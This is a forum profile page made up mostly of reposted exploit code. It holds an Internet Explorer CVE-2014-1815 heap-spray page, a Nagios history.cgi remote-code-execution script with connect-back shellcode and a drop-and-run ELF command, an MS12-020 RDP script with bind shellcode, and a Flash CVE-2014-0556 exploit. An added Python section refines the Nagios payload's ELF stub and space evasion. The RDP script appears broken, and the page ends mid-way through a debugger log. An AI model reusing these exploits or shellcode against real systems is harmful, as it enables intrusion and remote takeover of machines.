Everything posted by Nytro
-
I want to see 20-30 things you have donated before you give your opinion.
-
OWASP is on Friday. See you there.
-
CCleaner Pro Patching Tut
Nytro replied to Nytro's topic in Reverse engineering & exploit development
There are a few useful things in it, but nothing special. Other interesting forums: opensc, trojanforge, rohitab, tuts4you, kernelmode and many more. And @giv's reversing.ro.
-
CCleaner Pro Patching Tut by Kjacky
Home Page: http://www.piriform.com/
Tutorial: CCP
Source: EXETOOLS FORUM
-
CVE-2014-1815 Html code - Internet Explorer 6-11

<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function stc()
{
    var Then = new Date();
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
    document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
function cid()
{
    var swf = 0;
    try {
        swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
    } catch (e) {
    }
    if (!swf)
        return 0;
    var cookieString = new String(document.cookie);
    if(cookieString.indexOf("d93kaj3Nja3") == -1)
        {stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
function b2()
{
    try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
    try{xdd.outerText='';}catch(exception){}
    CollectGarbage();
    for(i=0;i<3333;i++) ll[i].className=tpx;
}
function a1(){
    if (!cid())
        return;
    document.body.contentEditable="true";
    try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
    try{document.selection.createRange().select();}catch(exception){}
}
</script>
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd ></marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
<p align=center><font color="#0066ff" size="2">Loading....,Please Wait</font><font color="#0066ff" size="2" face="verdana">...</font>
<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">

<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
<script>
var bar=0
var line="||"
var amount="||"
count()
function count(){
    bar=bar+2
    amount =amount + line
    document.loading.chart.value=amount
    document.loading.percent.value=bar+"%"
    if (bar<99)
        {setTimeout("count()",500);}
    else
        {window.location = "http://www.google.com.hk";}
}</script>
</p>
</form>
<p align="center">Wart,<a style="text-decoration: none" href="http://www.google.com.hk"><font color="#FF0000">kick me</font></a>.</p>
</body>
</html>

Source: CVE-2014-1815 Html code - Pastebin.com
-
CVE-2012-6096 - Nagios history.cgi Remote Command Execution

#!/usr/bin/python
#
# CVE-2012-6096 - Nagios history.cgi Remote Command Execution
# ===========================================================
# Another year, another reincarnation of classic and trivial
# bugs to exploit. This time we attack Nagios.. or more
# specifically, one of its CGI scripts. [1]
#
# The Nagios code is an amazing monster. It reminds me a
# lot of some of my early experiments in C, back when I
# still had no clue what I was doing. (Ok, fair enough,
# I still don't, heheh.)
#
# Ok, I'll come clean. This exploit doesn't exactly
# defeat FORTIFY. This approach is likely to work just FINE
# on other crippled distro's though, think of stuff like
# ArchLinux, Slackware, and all those Gentoo kids twiddling
# their CFLAGS. [2] (Oh and hey, BSD and stuff!)
#
# I do some very stupid shit(tm) here that might make an
# exploit coder or two cringe. My sincere apologies for that.
#
# Cold beer goes out to my friends who are still practicing
# this dying but interesting type of art:
#
#   * brainsmoke * masc * iZsh * skier_ * steve *
#
# -- blasty <blasty@fail0verflow.com> / 2013-01-08
#
# References:
# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
# [2] http://www.funroll-loops.info/
#
# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
# Next time you rebrand an exploit at least show some diligence and
# add some additional targets or improvements, so we can all profit!
#
# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
#

import os, sys, socket, struct, urllib, threading, SocketServer, time
from base64 import b64encode

SocketServer.TCPServer.allow_reuse_address = True

targets = [
    {
        "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
        "smash_len"  : 0xc37,
        "unescape"   : 0x0804b620,
        "popret"     : 0x08048fe4,
        "hostbuf"    : 0x080727a0,
        "system_plt" : 0x08048c7c
    }
]

def u32h(v):
    return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):
    return struct.pack("<L", v)

# Tiny ELF stub based on:
# http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
def make_elf(sc):
    elf_head = \
        "7f454c46010101000000000000000000" + \
        "02000300010000005480040834000000" + \
        "00000000000000003400200001000000" + \
        "00000000010000000000000000800408" + \
        "00800408" + u32h(0x54+len(sc))*2 + \
        "0500000000100000"
    return elf_head.decode("hex") + sc

# interactive connectback listener
class connectback_shell(SocketServer.BaseRequestHandler):
    def handle(self):
        print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
        print "[**] This shell is powered by insane amounts of illegal substances"
        s = self.request

        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True
            os.write(s.fileno(), "id\nuname -a\n")
            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)
                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt:
            pass
        finally:
            termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

if len(sys.argv) != 5:
    print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
    print "  >> \"Jetzt geht's Nagi-los!\"\n"
    print "  usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0])
    print "  targets:"
    i = 0
    for target in targets:
        print "    %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

# (off-by-one in the posted version: ">" let target index len(targets) through)
target_no = int(sys.argv[4])
if target_no < 0 or target_no >= len(targets):
    print "Invalid target specified"
    sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener
server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

# shellcode to be executed
# vanilla x86/linux connectback written by a dutch gentleman
# close to a decade ago.
cback = \
    "31c031db31c951b10651b10151b10251" + \
    "89e1b301b066cd8089c231c031c95151" + \
    "68badc0ded6668b0efb102665189e7b3" + \
    "1053575289e1b303b066cd8031c939c1" + \
    "740631c0b001cd8031c0b03f89d3cd80" + \
    "31c0b03f89d3b101cd8031c0b03f89d3" + \
    "b102cd8031c031d250686e2f7368682f" + \
    "2f626989e3505389e1b00bcd8031c0b0" + \
    "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..
# yes, even with the unescape() call in our return-chain..
# initially I was going to use some /dev/tcp based connectback..
# but /dev/tcp isn't available/accesible everywhere, so instead
# we drop an ELF into /tmp and execute that. The '>' characters
# also doesn't survive the trip so we work around this by using
# the tee(1) utility.
# If your target has a /tmp that is mounted with noexec flag,
# is severely firewalled or guarded by trained (watch)dogs..
# you might want to reconsider this approach!
cmd = \
    "rm -rf /tmp/x;" + \
    "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
    "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+'
# so apply some olde trick and rely on $IFS for argv separation
cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.
# We return into cgi_input_unescape() to get rid of
# URL escaping in a static buffer we control, and then
# we return into system@plt for the moneyshot.
#
# Ergo sum:
# There's no memoryleak or whatever needed to leak libc
# base and bypass ASLR.. This entire Nagios PoS is stringed
# together by system() calls, so pretty much every single one
# of their little silly binaries comes with a PLT entry for
# system(), huzzah!
rop = [
    u32(target['unescape']),
    u32(target['popret']),
    u32(target['hostbuf']),
    u32(target['system_plt']),
    u32(0xdeafbabe),
    u32(target['hostbuf'])
]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
# out of the box. Building HTTP requests from scratch is so 90ies..
params = urllib.urlencode({
    'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
})

print "[>>] CL1Q .."
f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)
print "[>>] CL4Q .."
f.read()

# TRIAL PERIOD ACTIVE, LOL!
time.sleep(0x666)
server.shutdown()

Source: [Python] CVE-2012-6096 exploit - Pastebin.com
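The two payload-shaping tricks the comments above describe (wrap the shellcode in an 84-byte ELF so it can be dropped with base64 -d | tee instead of a '>' redirect, and swap spaces for ${IFS} so the command survives urlencode on the way in and a %XX-only unescape on the way out) are easy to get subtly wrong. The following is an added Python 3 example, mine and not part of blasty's exploit, that rebuilds the stub with struct instead of a hex string and models the round trip. The load address 0x08048000, the 0x54 header size and the hex template (re-typed in post_stub() purely as a cross-check) come from the post; the one-byte 0xcc shellcode in the usage is a constructed placeholder.

```python
import base64
import struct
from urllib.parse import quote_plus, unquote

ELF_BASE = 0x08048000                  # load address used by the post's stub
EHDR_LEN = 0x34                        # sizeof(Elf32_Ehdr)
PHDR_LEN = 0x20                        # sizeof(Elf32_Phdr)
STUB_LEN = EHDR_LEN + PHDR_LEN         # 0x54: the shellcode follows the headers directly


def make_elf(shellcode: bytes) -> bytes:
    """Wrap raw i386 shellcode in a minimal static ELF with one RX PT_LOAD segment."""
    total = STUB_LEN + len(shellcode)
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2,                       # e_type      ET_EXEC
        3,                       # e_machine   EM_386
        1,                       # e_version
        ELF_BASE + STUB_LEN,     # e_entry     first shellcode byte
        EHDR_LEN,                # e_phoff     program header right after this header
        0, 0,                    # e_shoff, e_flags
        EHDR_LEN, PHDR_LEN, 1,   # e_ehsize, e_phentsize, e_phnum
        0, 0, 0,                 # no section headers at all
    )
    phdr = struct.pack(
        "<IIIIIIII",
        1,                       # p_type      PT_LOAD
        0,                       # p_offset    map the whole file from byte 0
        ELF_BASE, ELF_BASE,      # p_vaddr, p_paddr
        total, total,            # p_filesz, p_memsz
        5,                       # p_flags     PF_R | PF_X
        0x1000,                  # p_align
    )
    return ehdr + phdr + shellcode


def post_stub(shellcode: bytes) -> bytes:
    """The post's own hex template, kept here only to cross-check make_elf()."""
    filesz = struct.pack("<I", STUB_LEN + len(shellcode)).hex()
    head = ("7f454c46010101000000000000000000"
            "02000300010000005480040834000000"
            "00000000000000003400200001000000"
            "00000000010000000000000000800408"
            "00800408" + filesz * 2 + "0500000000100000")
    return bytes.fromhex(head) + shellcode


def parse_elf(blob: bytes) -> tuple:
    """Return (e_entry, p_filesz) of a 32-bit LSB ELF so the stub can be sanity-checked."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    e_entry = struct.unpack_from("<I", blob, 0x18)[0]
    e_phoff = struct.unpack_from("<I", blob, 0x1c)[0]
    p_filesz = struct.unpack_from("<I", blob, e_phoff + 0x10)[0]
    return e_entry, p_filesz


def build_command(elf: bytes, path: str = "/tmp/x") -> str:
    """Drop the ELF through base64 -d | tee (no '>' redirect) and run it.
    Spaces are replaced by ${IFS}, exactly as the post does."""
    b64 = base64.b64encode(elf).decode("ascii")
    cmd = f"rm -rf {path};echo {b64}|base64 -d|tee {path}|chmod +x {path};{path};"
    return cmd.replace(" ", "${IFS}")


def survives_cgi_unescape(cmd: str) -> bool:
    """Model the round trip: urlencode() on the client, then a server-side unescape
    that decodes %XX only (the post notes that '+' never turns back into a space)."""
    return unquote(quote_plus(cmd)) == cmd


if __name__ == "__main__":
    sc = b"\xcc"                                 # constructed placeholder shellcode (int3)
    elf = make_elf(sc)
    entry, size = parse_elf(elf)
    print(f"entry=0x{entry:08x} filesz=0x{size:x} matches_post={elf == post_stub(sc)}")
    print("plain command survives:", survives_cgi_unescape("chmod +x /tmp/x"))
    print("${IFS} command survives:", survives_cgi_unescape(build_command(elf)))
```

The interesting failure is the second print: a command with a literal space comes back from the %XX-only unescape with a '+' in it, while the ${IFS} version round-trips unchanged because '$', '{' and '}' are percent-encoded on the way in and decoded by the unescape call in the return chain.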
-
CVE-2012-0002 - Remote Desktop Protocol (RDP)

#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################

import struct
import sys
from threading import Thread
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

#Payload
payload = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making teh packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
    target = sys.argv[1]
    print '\nUsage: %s <target ip> \n' % sys.argv[0]
    sys.exit(-1)
    current = SRVSVC_Exploit(target)
    current.start()

Note: this filthy syntax highlighter sticks spaces all over the place. Grab it from the source.

Source: [Python] CVE-2012-0002 - Pastebin.com
-
CVE-2014-0556
By: hdarwin (http://pastebin.com/u/hdarwin) on Sep 27th, 2014 (edited)

/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020
eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
4141411c ??              ???
*/

package
{
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.system.Capabilities;
    import flash.external.ExternalInterface

    public class Main extends Sprite
    {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version)
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint

        public function Main():void
        {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }
            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }
            bitmap.copyPixelsToByteArray(rect, ba[1601])
            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break
            ob[i0][1024 * 3 - 2] = 0xffffffff
            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true
            for (i2 = 1000; ; i2++) {
                if (
                    ob[i1][0xFFFFFFFF - i2 + 0] == 0 &&
                    ob[i1][0xFFFFFFFF - i2 + 10] == 1 &&
                    ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]
                ) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                } else if (
                    ob[i1][i2 + 0] == 0 &&
                    ob[i1][i2 + 10] == 1 &&
                    ob[i1][i2 + 5] == ob[i1][i2 + 15]
                ) {
                    vector = ob[i1][i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                }
            }
            snd = new Sound()
            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
                ob[i2] = null
                ob[i2] = new Vector.<Object>(1014)
                ob[i2][0] = snd
                ob[i2][1] = snd
            }
            for (i2 = 0; ; i2++) {
                if (ob[i0][i2 + 0] == 1014 &&
                    ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
                    ob[i0][i2 + 3] == 1
                ) {
                    str += "\n\nDump Vector<Object>"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\n*** V-Table Modify ***"
                    write(ob[i0][i2 + 1] - 1, vector + 8)
                    for (i3 = 0; i3 < 1008; i3++) {
                        ob[i0][i3] = 0x41414100 | i3
                    }
                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }
                    break
                }
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
            ob[i0][1024 * 3 - 2] = 0
            var tf:TextField = new TextField();
            tf.width = 800;
            tf.height = 800;
            tf.text = str;
            addChild(tf)
            if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
        }

        private function write(addr:uint, data:uint):void
        {
            ob[i0][(addr - vector) / 4 - 2] = data
        }

        private function read(addr:uint):uint
        {
            return ob[i0][(addr - vector) / 4 - 2]
        }

        private function zeroPad(number:String, width:int):String
        {
            if (number.length < width) return "0" + zeroPad(number, width-1)
            return number
        }

        public function exploit():void
        {
            snd.toString()
        }
    }
}

=============================================================================================================================

/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63048 cc              int     3
1:020> dd esp l4
08d63048  cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
